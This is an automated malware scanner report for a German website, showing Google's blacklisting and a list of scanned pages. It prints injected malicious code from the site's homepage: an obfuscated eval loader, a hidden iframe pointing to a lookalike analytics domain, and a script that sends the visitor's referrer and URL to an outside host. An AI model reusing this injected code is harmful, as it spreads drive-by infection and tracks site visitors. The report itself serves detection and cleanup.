New scan:

Malware Scanner report for a-grieskamp-werbung.de

Malicious/Suspicious/Total urls checked
0/1/16
1 page has suspicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "a-grieskamp-werbung.de" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=a-grieskamp-werbung.de

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://a-grieskamp-werbung.de/
200 OK
Content-Length: 8620
Content-Type: text/html
suspicious
Suspicious code found

<script type="text/javascript" src="http://tanzenmachtschule.ch/jslog/js/g4fzbrdx.php?id=3481173"></script>

Decoded script:


eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1X(1Q(p,a,c,k,e,d){e=1Q(c){1R(c<a?\'\':e(25(c/a)))+((c=c%a)>21?1T.26(c+29):c.1Z(1Y))};1S(!\'\'.1V(/^/,1T)){1U(c--){d[e(c)]=k[c]||e(c)}k=[1Q(e){1R d[e]}];e=1Q(){1R\'\\\\w+\'};c=1};1U(c--){1S(k[c]){p=p.1V(1W 23(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}1R p}(\'14(O(p,a,c,k,e,d
... 8393 bytes are skipped ...
E%3Ciframe%20width%3D%221%22%20height%3D%221%22%20src%3D%22http%3A//goog1e-ana1ytics.pw/223r%22%20scrolling%3D%22no%22%20frameborder%3D%220%22%20style%3D%22display%3Anone%22%3E%3C/iframe%3E%20%3C/script%3E';var _0Il=document.createElement('script');_0Il.src='http://jqueryapi.info/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL);var _1OI=document.getElementsByTagName('head')[0];_1OI.appendChild(_0Il);document.write(unescape(_escape));

http://a-grieskamp-werbung.de/res/jquery.js?54
200 OK
Content-Length: 93636
Content-Type: application/x-javascript
clean
http://a-grieskamp-werbung.de/res/x5engine.js?54
200 OK
Content-Length: 3657
Content-Type: application/x-javascript
clean
http://irishmoc.org/api.js
404 Not found
Content-Length: 1187
Content-Type: text/html
clean
http://irishmoc.org/
HTTP/1.1 303 See Other
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Tue, 13 Jan 2015 18:16:10 GMT
Pragma: no-cache
Location: http://www.irishmoc.org/activity.php?s=b459149c481c0382892d089c657d0975
Server: Zeus/4.3
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: X-Mapping-dccahcdn=0E28567A32C3D6AF99E7843E9816AA5D; path=/
Set-Cookie: bb_sessionhash=b459149c481c0382892d089c657d0975; path=/; HttpOnly
Set-Cookie: bb_lastvisit=1421172971; expires=Wed, 13-Jan-2016 18:16:11 GMT; Max-Age=31536000; path=/
Set-Cookie: bb_lastactivity=0; expires=Wed, 13-Jan-2016 18:16:11 GMT; Max-Age=31536000; path=/
Set-Cookie: PHPSESSID=mr22afg909b9278ra768qsgjk7; path=/
clean
http://www.irishmoc.org/activity.php?s=b459149c481c0382892d089c657d0975
200 OK
Content-Length: 18250
Content-Type: text/html
clean
http://www.irishmoc.org/clientscript/vbulletin-core.js?v=422
200 OK
Content-Length: 51946
Content-Type: application/x-javascript
clean
http://irishmoc.org/clientscript/vbulletin_activitystream.js?v=422
200 OK
Content-Length: 10072
Content-Type: application/x-javascript
clean
http://irishmoc.org/clientscript/vbulletin_md5.js?v=422
200 OK
Content-Length: 5464
Content-Type: application/x-javascript
clean
http://www.irishmoc.org/clientscript/vbulletin_facebook.js?v=422
200 OK
Content-Length: 6501
Content-Type: application/x-javascript
clean
http://irishmoc.org/forum.php?s=b459149c481c0382892d089c657d0975
200 OK
Content-Length: 60674
Content-Type: text/html
clean
http://irishmoc.org/clientscript/vbulletin_read_marker.js?v=422
200 OK
Content-Length: 4460
Content-Type: application/x-javascript
clean
http://irishmoc.org/register.php?s=b459149c481c0382892d089c657d0975
200 OK
Content-Length: 17894
Content-Type: text/html
clean
http://irishmoc.org/faq.php?s=b459149c481c0382892d089c657d0975
200 OK
Content-Length: 18427
Content-Type: text/html
clean
http://irishmoc.org/activity.php?s=b459149c481c0382892d089c657d0975
200 OK
Content-Length: 18246
Content-Type: text/html
clean
http://irishmoc.org/search.php?s=b459149c481c0382892d089c657d0975&do=getnew&contenttype=vBForum_Post
200 OK
Content-Length: 22055
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: a-grieskamp-werbung.de

Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 13 Jan 2015 18:16:09 GMT
Accept-Ranges: bytes
ETag: "2b9c006-21ac-16da79c0"
Server: Apache/2.0.55 (Ubuntu) mod_python/3.1.4 Python/2.4.3 PHP/5.1.2 mod_ssl/2.0.55 OpenSSL/0.9.8a mod_perl/2.0.2 Perl/v5.8.7
Content-Length: 8620
Content-Type: text/html; charset=UTF-8
Last-Modified: Thu, 11 Dec 2014 04:19:59 GMT

...8620 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: a-grieskamp-werbung.de
Referer: http://www.google.com/search?q=a-grieskamp-werbung.de

Result:
The result is similar to the first query. There are no suspicious redirects found.